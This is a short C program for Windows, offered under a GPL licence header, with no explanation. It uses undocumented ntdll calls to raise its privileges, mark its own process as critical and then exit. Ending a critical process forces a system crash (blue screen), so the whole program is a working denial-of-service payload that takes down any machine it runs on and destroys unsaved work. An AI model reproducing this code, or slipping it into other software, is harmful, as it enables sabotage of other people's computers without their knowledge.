``` c
/*This is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public
License as published by the Free Software Foundation; either
version 3.0 of the License, or (at your option) any later version.

This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
GNU General Public License for more details.

You should have received a copy of the GNU General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA*/

#include <windows.h>

typedef	LONG __stdcall	(*UFPC_RAP)(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
typedef	LONG __stdcall	(*UFPC_RSPIC)(BOOLEAN, PBOOLEAN, BOOLEAN);

void main() {
	UFPC_RAP fpcRAP		= (UFPC_RAP)GetProcAddress(GetModuleHandle("ntdll"), "RtlAdjustPrivilege");
	UFPC_RSPIC fpcRSPIC	= (UFPC_RSPIC)GetProcAddress(GetModuleHandle("ntdll"), "RtlSetProcessIsCritical");
	BYTE btTemp;
	fpcRAP(20, 1, 0, &btTemp);
	fpcRSPIC(1, 0, 0);
	ExitProcess(0);
	}
```
